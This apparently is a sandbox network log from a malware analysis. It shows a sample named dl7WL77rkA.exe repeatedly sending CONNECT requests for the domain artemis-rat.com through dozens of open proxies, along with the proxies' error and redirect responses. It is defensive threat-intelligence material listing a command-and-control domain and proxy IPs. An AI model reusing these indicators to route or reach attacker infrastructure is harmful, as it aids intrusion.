                                                                                                                                                                                                                                                            1051192.168.2.55277751.15.242.20288883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.029895067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806175947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811480045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.608525038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1052192.168.2.55278431.200.242.20199853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.030690908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1053192.168.2.55275295.164.89.12388883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.030693054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.332989931 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1054192.168.2.552765130.162.213.17531293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.030757904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.349515915 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1055192.168.2.55287223.95.209.142156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.031367064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1056192.168.2.552840198.199.86.1131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.031542063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.412338972 CET28INHTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1057192.168.2.55285138.162.13.18531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.031915903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.488413095 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1058192.168.2.552764222.255.238.159803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.032095909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.364196062 CET481INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Location: https://ktxcomay.com.vn
                                                                                                                                                                                                                                                            Content-Length: 289
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 74 78 63 6f 6d 61 79 2e 63 6f 6d 2e 76 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://ktxcomay.com.vn">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.283828974 CET481INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Location: https://ktxcomay.com.vn
                                                                                                                                                                                                                                                            Content-Length: 289
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 74 78 63 6f 6d 61 79 2e 63 6f 6d 2e 76 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://ktxcomay.com.vn">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1059192.168.2.552757178.54.21.20380813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.032097101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1060192.168.2.55279191.134.140.160325883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.032480001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806293964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811677933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796539068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.514621973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1061192.168.2.5527615.252.23.22010813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.032751083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1062192.168.2.550848159.112.141.4480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.035974979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.108072042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.202241898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.311379910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1063192.168.2.552880172.67.182.169803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.035974979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.190325022 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1064192.168.2.552820211.222.252.18781933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.037698030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1065192.168.2.55288223.227.38.198803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.037698984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.192110062 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1066192.168.2.55277238.54.16.97803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.038161039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1067192.168.2.552378115.146.225.137100463876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.038892031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1068192.168.2.552774202.139.198.1530503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.040937901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.476854086 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
